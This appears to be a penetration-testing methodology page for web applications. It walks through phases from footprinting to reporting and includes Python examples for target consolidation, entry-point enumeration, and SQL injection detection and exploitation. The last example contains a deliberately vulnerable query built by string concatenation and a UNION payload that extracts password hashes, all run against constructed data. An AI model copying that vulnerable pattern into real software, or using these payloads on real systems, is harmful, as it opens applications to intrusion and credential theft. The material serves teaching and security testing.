In the initial phase we try to understand the complete architecture of the application along with its objectives. This phase is covered by assimilating the available documents and by interviewing stakeholders, both on-site and off-site. It helps in scoping the activities and the road map. On the basis of the requirements, functionalities and architecture we come up with possible action plans and the effort required to secure the applications.
Application Footprinting – It is important to identify all applications running on a particular client's infrastructure, starting with zero knowledge. We use our own tools and methods to identify IP blocks, hosts, domains, cross-domains and child-domains (subdomains). This helps in locking down the complete set of possible targets.
Application Discovery – In this phase we identify the set of live and functional applications, so that we can move on to threat modeling for each application running on the client's infrastructure.
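The footprinting and discovery phases above produce raw host and address data; the step that matters for scoping is consolidating it into netblocks, domain relationships and live targets. The script below is an added example written for this page, not a tool from the original text: the hostnames, addresses and probe results are constructed, the scoped apex "example.com" is hypothetical, and the apex extraction is a deliberate simplification noted in the comment.

```python
"""Consolidate footprinting and discovery data into a target list.

Added example; the consolidation logic is our own and the records below
are constructed, not data from a real engagement.
"""
import ipaddress
from collections import defaultdict

# Constructed sample of (hostname, resolved IP) pairs, as an engagement would
# collect them from passive DNS, certificate transparency and reverse lookups.
PASSIVE_DNS = [
    ("www.example.com", "203.0.113.10"),
    ("api.example.com", "203.0.113.11"),
    ("dev.api.example.com", "203.0.113.12"),
    ("mail.example.com", "198.51.100.5"),
    ("portal.example-partner.net", "203.0.113.20"),
    ("old.example.com", "203.0.113.10"),   # same IP as www: name-based virtual hosting
]

# Constructed sample from application discovery: hosts that answered an HTTP probe.
LIVE_HTTP = {"www.example.com", "api.example.com",
             "dev.api.example.com", "portal.example-partner.net"}


def apex(hostname):
    """Registrable domain of a hostname. Simplification: last two labels
    (wrong for multi-part public suffixes such as co.uk; a real tool
    consults the Public Suffix List)."""
    return ".".join(hostname.lower().rstrip(".").split(".")[-2:])


def classify(hostname, scope_apex):
    """Child-domain of the scoped apex, the apex itself, or a cross-domain
    asset that shares infrastructure but belongs to another registrable domain."""
    a = apex(hostname)
    if a != scope_apex:
        return "cross-domain"
    return "apex" if hostname.lower() == a else "child-domain"


def footprint(records, scope_apex, live_hosts, prefix=24):
    """Map each host to its IP, netblock, domain relation and liveness, and
    group hostnames by /prefix netblock so adjacent addresses can be swept."""
    hosts = {}
    by_block = defaultdict(set)
    for name, ip in records:
        addr = ipaddress.ip_address(ip)
        block = ipaddress.ip_network(f"{addr}/{prefix}", strict=False)
        by_block[block].add(name)
        hosts[name] = {
            "ip": str(addr),
            "block": str(block),
            "relation": classify(name, scope_apex),
            "live": name in live_hosts,
        }
    return hosts, {str(b): sorted(n) for b, n in by_block.items()}


def shared_ips(records):
    """IPs serving more than one hostname: each extra name is a virtual host
    that a plain IP scan would miss and must be probed with its Host header."""
    names = defaultdict(set)
    for name, ip in records:
        names[ip].add(name)
    return {ip: sorted(n) for ip, n in names.items() if len(n) > 1}


def targets(hosts):
    """Live hosts only: the application set that moves on to threat modeling."""
    return sorted(n for n, h in hosts.items() if h["live"])


if __name__ == "__main__":
    hosts, blocks = footprint(PASSIVE_DNS, "example.com", LIVE_HTTP)
    for block, names in sorted(blocks.items()):
        print(block, names)
    print("virtual hosts:", shared_ips(PASSIVE_DNS))
    print("targets:", targets(hosts))
```

Two things the consolidation surfaces that a flat host list hides: the cross-domain host on the client's netblock, which needs an explicit scoping decision before it is touched, and the second hostname behind a shared IP, which only appears when requests carry the right Host header.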
Application Threat Modeling – In this phase each application is studied in depth and its critical information is mapped. This information set includes objectives, dependencies, type of servers (web, application and database), roles, components, third-party blocks and use cases. It is used to derive a threat matrix for each application on the basis of its possible attack vectors and the libraries it depends on.
Application Deployment Assessment – The application deployment configurations and file system are evaluated for security on the web, application and database servers.
Application Enumeration and Profiling – In this phase we run several different tools against the target application and enumerate the entire application, along with the entry points and attributes of each resource residing on it. This helps in profiling the entire application along with its modules, functionalities and resource attributes.
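The enumeration tools referred to above are not named on this page; what they all produce is a list of entry points (URL, method, parameters) with the attributes a tester needs for each one. The parser below is an added example of that step, written for this page rather than taken from the original text: the base URL "https://app.example.com/" and the sample page are constructed, and the parser handles one crawled response rather than driving a crawl.

```python
"""Enumerate entry points and their attributes from a crawled page.

Added example; the parser and the sample page are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse, parse_qs

BASE = "https://app.example.com/"   # hypothetical target

# Constructed sample standing in for one crawled response.
SAMPLE_HTML = """
<html><body>
<a href="/search?q=shoes&sort=price">Search</a>
<a href="/item?id=1">Item 1</a>
<a href="/item?id=2">Item 2</a>
<a href="/about">About</a>
<form action="/login" method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="hidden" name="csrf_token" value="abc">
  <input type="submit" value="Go">
</form>
<form action="/upload" method="post" enctype="multipart/form-data">
  <input type="file" name="avatar">
  <select name="visibility"><option>public</option></select>
</form>
</body></html>
"""


class EntryPointParser(HTMLParser):
    """Collects one record per resource: URL, HTTP method, parameter names
    and the type of each input. Hidden tokens and file uploads are the
    attributes a tester wants to see at a glance."""

    def __init__(self, base):
        super().__init__()
        self.base = base
        self.found = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            parsed = urlparse(urljoin(self.base, a["href"]))
            self.found.append({
                "url": parsed._replace(query="", fragment="").geturl(),
                "method": "GET",
                "params": list(parse_qs(parsed.query)),
                "types": {},
            })
        elif tag == "form":
            self._form = {
                "url": urljoin(self.base, a.get("action") or self.base),
                "method": (a.get("method") or "GET").upper(),
                "params": [],
                "types": {},
            }
            if a.get("enctype"):
                self._form["enctype"] = a["enctype"]
        elif tag in ("input", "select", "textarea") and self._form is not None:
            name = a.get("name")
            if name:   # unnamed controls are never submitted to the server
                self._form["params"].append(name)
                self._form["types"][name] = a.get("type", "text") if tag == "input" else tag

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.found.append(self._form)
            self._form = None


def enumerate_entry_points(base, html):
    """Parse one page and return distinct entry points, keyed by URL, method
    and parameter set so that /item?id=1 and /item?id=2 collapse to one."""
    parser = EntryPointParser(base)
    parser.feed(html)
    seen, result = set(), []
    for ep in parser.found:
        key = (ep["url"], ep["method"], tuple(ep["params"]))
        if key not in seen:
            seen.add(key)
            result.append(ep)
    return result


if __name__ == "__main__":
    for ep in enumerate_entry_points(BASE, SAMPLE_HTML):
        print(ep["method"], ep["url"], ep["params"], ep.get("enctype", ""))
```

The deduplication key is what turns a crawl of thousands of product pages into a handful of testable entry points; the recorded input types are what later decide which test cases apply (a file input gets upload tests, a hidden csrf_token parameter gets the CSRF control checked).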
Security Control and Test Cases – On the basis of the application we build a large set of possible test cases and the security controls required for the application. This helps in building up the full set of testing methods against vulnerabilities.
Security Control Categories – Authentication, Access Controls/Authorization, API misuse, Path traversal, Sensitive information leakage, Error handling, Session management, Protocol abuse, Input validation, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Logic bypass, Insecure crypto, Denial of Service, Malicious Code Injection, SQL injection, XPath and LDAP injection, OS command injection, Parameter manipulation, Brute force, Buffer Overflow, Format string, HTTP response splitting, HTTP replay, XML injection, Canonicalization, Logging and auditing.
Vulnerability Assessment – On the basis of the resource attribution and control categories, complete vulnerability scanning is done using tools and manual observation. This detects the vulnerabilities residing in the applications and gives an actionable item list for application security.
Exploitation and Pen-testing – In this phase full-blown penetration testing and exploitation of the discovered vulnerabilities is performed to determine the severity and possible impact of each vulnerability.
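The difference between the assessment and exploitation phases above is the difference between showing that an input influences a query and showing what an attacker gets from it. The block below is an added example for this page, not code from the original text: a constructed SQLite-backed search handler written the vulnerable way and the parameterized way, a boolean-based probe that detects the SQL injection control failing, and a UNION payload that turns the detection into a measured impact (credential rows disclosed). Table names, rows and hash strings are all constructed.

```python
"""Detect, then exploit, SQL injection in a constructed search handler.

Added example. The schema, rows and hash values are made up; the probe and
exploit logic are generic boolean-based and UNION-based techniques.
"""
import sqlite3


def make_db():
    """In-memory application database with a public table and a sensitive one."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price INTEGER);
        CREATE TABLE users(id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'shoes', 50), (2, 'shirt', 20), (3, 'hat', 15);
        INSERT INTO users VALUES (1, 'admin', '$2b$12$constructed.hash.for.admin'),
                                 (2, 'bob', '$2b$12$constructed.hash.for.bob');
    """)
    return db


def search_vulnerable(db, term):
    """Deliberately vulnerable: the search term is concatenated into SQL text.
    Errors are swallowed, so a scanner gets no error message to key on and
    must rely on behavioural (boolean) differences."""
    sql = "SELECT id, name, price FROM products WHERE name = '" + term + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return []


def search_hardened(db, term):
    """Mitigation: a bound parameter keeps the term out of the SQL grammar."""
    return db.execute(
        "SELECT id, name, price FROM products WHERE name = ?", (term,)
    ).fetchall()


def probe_sqli(handler, db, baseline="shoes"):
    """Boolean-based detection: an injected always-true condition must leave
    the baseline response unchanged while an always-false one must alter it.
    Both conditions must hold, which rules out a handler that simply ignores
    the input."""
    base = handler(db, baseline)
    true_resp = handler(db, baseline + "' AND '1'='1")
    false_resp = handler(db, baseline + "' AND '1'='2")
    return base != [] and base == true_resp and true_resp != false_resp


def exploit_union(handler, db):
    """Exploitation: a UNION with matching column count pulls rows from the
    users table through the products search. The trailing '--' comments out
    the closing quote the handler appends."""
    payload = "x' UNION SELECT id, username, password_hash FROM users -- "
    return handler(db, payload)


def assess(handler, db):
    """One finding as the report needs it: detected or not, and if so the
    measured impact rather than a theoretical one."""
    finding = {"control": "SQL injection", "detected": probe_sqli(handler, db)}
    if finding["detected"]:
        rows = exploit_union(handler, db)
        finding["impact"] = f"{len(rows)} credential rows disclosed from users table"
    return finding


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", assess(search_vulnerable, db))
    print("hardened:  ", assess(search_hardened, db))
```

The probe deliberately does not depend on error messages, because the vulnerable handler hides them; that is the common case in production and the reason boolean and time-based techniques exist. Against the hardened handler the same payloads are searched for as literal product names, so neither the probe nor the UNION returns anything.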
Mitigation Strategies – On the basis of the overall findings, vulnerabilities, architecture and best practices we build a comprehensive mitigation plan along with recommendations. These strategies need to be implemented for the overall security of the application layer.
Reporting – All observations, findings and test sets are reported in the final document, which includes an overall rating for all the different findings. The report covers findings, details, recommendations, severity, impact and references. We also map these findings to OWASP, WASC, MITRE, SANS, etc. to allow a better comparison with industry standards.